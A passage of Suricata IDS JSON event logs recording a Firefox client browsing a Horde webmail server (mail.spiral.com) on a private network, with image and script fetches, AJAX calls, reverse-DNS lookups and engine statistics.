rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:27:05.117258+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:27:05.129323+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:05.129537+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:27:09.000200+0000","event_type":"stats","stats":{"uptime":15281,"capture":{"kernel_packets":142477,"kernel_drops":0},"decoder":{"pkts":142501,"bytes":97889223,"invalid":196,"ipv4":140902,"ipv6":10,"ethernet":142501,"raw":0,"null":0,"sll":0,"tcp":135303,"udp":5388,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2925,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2941,"synack":2932,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1928,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2465,"failed_udp":116},"tx":{"http":5062,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2549}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":191168,"memcap":0}}} {"timestamp":"2020-02-29T00:27:09.589567+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53172,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:27:09.593077+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53174,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:27:10.080478+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":8}} {"timestamp":"2020-02-29T00:27:10.090833+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":16}} {"timestamp":"2020-02-29T00:27:10.090862+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":10}} {"timestamp":"2020-02-29T00:27:11.000463+0000","flow_id":2027510962510488,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:10.449176+0000","end":"2020-02-29T00:22:10.558947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:11.000760+0000","flow_id":643767004159899,"event_type":"flow","src_ip":"192.168.10.130","src_port":34304,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":61,"bytes_toserver":3771,"bytes_toclient":80639,"start":"2020-02-29T00:26:01.384923+0000","end":"2020-02-29T00:26:06.438507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:11.724590+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:27:11.749561+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36399,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:11.774787+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":0}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:16.000175+0000","event_type":"stats","stats":{"uptime":15288,"capture":{"kernel_packets":142521,"kernel_drops":0},"decoder":{"pkts":142534,"bytes":97894139,"invalid":196,"ipv4":140933,"ipv6":10,"ethernet":142534,"raw":0,"null":0,"sll":0,"tcp":135332,"udp":5390,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2926,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2942,"synack":2933,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1929,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2466,"failed_udp":116},"tx":{"http":5064,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2550}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10890,"memcap_state":0,"memcap_global":0},"http":{"memuse":40157,"memcap":0}}} {"timestamp":"2020-02-29T00:27:16.947002+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.456753+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:27:19.458133+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:19.462861+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464307+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","state":"CLOSED","stored":false,"size":138,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464428+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:27:19.465999+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:27:19.465837+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.467776+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.479778+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} {"timestamp":"2020-02-29T00:27:19.480640+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:19.481302+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.481869+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:27:19.489678+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41386,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:19.522783+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.693191+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4807,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695078+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695774+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:27:19.696292+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53184,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 